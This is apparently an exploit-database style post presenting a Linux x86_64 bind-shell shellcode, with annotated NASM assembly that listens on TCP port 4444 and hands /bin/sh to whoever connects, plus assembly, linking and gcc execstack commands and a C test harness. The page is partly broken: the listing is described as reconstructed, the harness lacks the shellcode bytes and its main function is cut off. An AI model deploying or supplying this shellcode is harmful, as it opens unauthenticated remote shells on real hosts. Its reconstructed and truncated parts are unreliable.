Linux x86_64 TCP4444 Bindshell Shellcode

June 9, 2019   |   by Zeroday
A 131-byte Linux/x86_64 bind-shell shellcode: it listens on TCP/4444 and hands whoever connects a /bin/sh.
;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length:  131 bytes
;github =
;test shellcode = after you run the shellcode, open another terminal and run "nc -vv <target-ip> 4444" (127.0.0.1 when testing on the same host; netcat needs a host argument). Anyone who can reach that port gets the shell, so test on an isolated host or firewall the port.
================== ASSEMBLY ========================================
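global _start
section .text

; ---------------------------------------------------------------------------
; Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh), NASM (Intel) syntax.
;
; Reconstruction note: the listing as printed on this page had lost the
; `_start:` and `dup2loop:` labels and every `syscall` instruction, so it did
; not assemble (`dup2loop` was referenced by loopnz but never defined) and
; could not have run.  Those are restored below exactly where the original
; per-block comments call for them.  The close() that the original comment
; mentions before the dup2 loop is NOT issued in the printed sequence -- the
; value 3 is only used to seed the dup2 counter -- so the listening socket
; stays open.  By hand count this version assembles to roughly 129 bytes;
; the page's "131 bytes" may come from small encoding differences or from a
; close() syscall that the printed listing dropped.  Verify with
; `objdump -d tcp_bind` before quoting either number.
;
; Register roles:
;   rdi  = socket fd (listening, then the accepted client)
;   r10  = scratch used to swap the two fds
;   rsi, rdx = syscall arguments;  rax = syscall number / return value
;   rcx, r11 are clobbered by every `syscall` (rcx = return RIP, r11 = RFLAGS)
;
; Null-byte avoidance: small immediates go through push imm8 / pop reg, the
; 64-bit string goes through mov r64, imm64, and sin_family/sin_port are
; written as byte/word stores.
;
; Security notes for anyone using this:
;   * bind() is to INADDR_ANY: the shell is offered, unauthenticated, on every
;     interface of the host.  Anyone who can reach TCP/4444 gets it.
;   * No syscall result is checked.  If socket()/bind() fail (port already in
;     use, no privileges) the code still falls through: accept() and dup2()
;     fail on a bad fd, and execve() then runs /bin//sh on the caller's own
;     stdio.
;   * A process that binds 0.0.0.0:4444 and execs /bin/sh with stdio pointing
;     at a socket is an easy detection signature; expect EDR/netstat to see it.
; ---------------------------------------------------------------------------

SYS_CLOSE       equ 3
SYS_DUP2        equ 33
SYS_SOCKET      equ 41
SYS_ACCEPT      equ 43
SYS_BIND        equ 49
SYS_LISTEN      equ 50
SYS_EXECVE      equ 59
AF_INET         equ 2
PORT_4444_BE    equ 0x5c11          ; htons(4444): 4444 = 0x115c, stored as bytes 11 5c
SOCKADDR_IN_LEN equ 16

_start:
        ; --- fd = socket(AF_INET, SOCK_STREAM, 0) ---
        xor     rsi, rsi                ; rsi = 0; inc below gives SOCK_STREAM (1) without a null byte
        push    SYS_SOCKET              ; push imm8 / pop reg: 64-bit register load in 3 bytes, no nulls
        pop     rax
        push    AF_INET
        pop     rdi
        inc     rsi                     ; SOCK_STREAM
        xor     rdx, rdx                ; protocol = 0
        syscall
        xchg    rdi, rax                ; rdi = listening fd (rax receives the old rdi, unused)

        ; --- struct sockaddr_in on the stack, 16 zero-filled bytes ---
        ;   [rsp+0]  sin_family = AF_INET
        ;   [rsp+2]  sin_port   = htons(4444)
        ;   [rsp+4]  sin_addr   = INADDR_ANY (0.0.0.0: every interface)
        ;   [rsp+8]  sin_zero
        xor     rax, rax
        push    rax
        push    rax
        mov     word [rsp+2], PORT_4444_BE
        mov     byte [rsp], AF_INET     ; byte store keeps the encoding null-free

        ; --- bind(fd, &sockaddr_in, 16) ---
        xor     rdx, rdx
        push    SYS_BIND
        pop     rax
        push    rsp
        pop     rsi                     ; rsi = &sockaddr_in
        add     rdx, SOCKADDR_IN_LEN    ; add imm8 instead of mov: no null bytes
        syscall

        ; --- listen(fd, 1) ---
        xor     rsi, rsi
        push    SYS_LISTEN
        pop     rax
        inc     rsi                     ; backlog = 1
        syscall

        ; --- client = accept(fd, &addr, &addrlen) ---
        ; The sockaddr_in buffer is reused as the peer-address output.  Only a
        ; single byte (0x10) is stored for addrlen, but the kernel reads a 32-bit
        ; socklen_t there whose upper bytes are the first bytes of the sockaddr,
        ; so the length it sees is much larger than 16; this works only because
        ; the kernel clamps an oversize *addrlen to the real address length.
        ; Passing NULL for both (xor esi,esi / xor edx,edx) would be shorter and
        ; avoid the trick -- the peer address is never used.
        push    SYS_ACCEPT
        pop     rax
        mov     rsi, rsp                ; rsi = &addr (the old sockaddr_in)
        mov     byte [rsp-1], 0x10      ; write below rsp: user-space red zone, safe
        dec     rsp                     ; rsp is byte-misaligned from here on; harmless, only syscalls follow
        mov     rdx, rsp                ; rdx = &addrlen
        syscall
        xchg    r10, rax                ; r10 = client fd

        ; --- seed the dup2 counter: rsi = 3 ---
        ; rax = SYS_CLOSE, but no syscall is issued here in the printed listing,
        ; so nothing is closed; the 3 is only the loop counter.
        push    SYS_CLOSE
        pop     rax
        push    rax
        xchg    rdi, r10                ; rdi = client fd (r10 = listening fd, no longer used)
        pop     rsi                     ; rsi = 3

        ; --- dup2(client, 2); dup2(client, 1); dup2(client, 0) ---
dup2loop:
        push    SYS_DUP2
        pop     rax
        dec     rsi                     ; ZF is set when rsi hits 0, i.e. on the stdin iteration
        syscall                         ; flags survive the syscall: RFLAGS is restored from r11 on sysret
        loopnz  dup2loop                ; rcx--; jump while rcx != 0 && ZF == 0.  rcx was just set by
                                        ; syscall to the (non-zero) return RIP, so only ZF ends the loop.

        ; --- execve("/bin//sh", NULL, NULL) ---
        xor     eax, eax
        add     al, SYS_EXECVE          ; 2-byte form; mov eax, 59 would encode null bytes
        xor     rdi, rdi
        push    rdi                     ; NUL terminator for the path
        mov     rdi, 0x68732F2f6e69622F ; "/bin//sh" little-endian; the extra '/' pads to 8 bytes without a NUL
        push    rdi
        mov     rdi, rsp                ; rdi = "/bin//sh"
        xor     rsi, rsi                ; argv = NULL
        xor     rdx, rdx                ; envp = NULL
        syscall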
=======Generate Shellcode==========================================
# Assemble the NASM source into an ELF64 object and link it into a standalone
# binary that can be run directly for testing.
nasm -f elf64 -o tcp_bind.o tcp_bind.nasm
# The page does not show the step that turns the linked .text bytes into the
# "\x.." string the C harness below expects (commonly done with objdump -d on
# tcp_bind); add it here if you reproduce the build.
ld -o tcp_bind tcp_bind.o
=========generate C program to exploit=============================
# Build the C harness that jumps into the shellcode array.
#   -z execstack        the bytes live in a writable array in .data; on x86-64 this
#                       flag used to make all of that executable only through the
#                       legacy READ_IMPLIES_EXEC personality, which Linux no longer
#                       applies to 64-bit binaries (since 5.8), so this harness
#                       typically dies with SIGSEGV on current kernels -- copy the
#                       bytes into an mmap(PROT_READ|PROT_WRITE|PROT_EXEC) region or
#                       mprotect() the array's page instead.
#   -fno-stack-protector is irrelevant here; the harness overflows nothing.
# The harness prints strlen() of the array, which is only the real length for a
# null-free payload (this one is built to be).
gcc -o bind -z execstack -fno-stack-protector bind.c
======================C program=====================================
#include <stdio.h>
#include <string.h>
unsigned char shellcode[]=\
int main(){
        printf("length of your shellcode is: %d\n", (int)strlen(shellcode));
        int (*ret)() = (int(*)())shellcode;
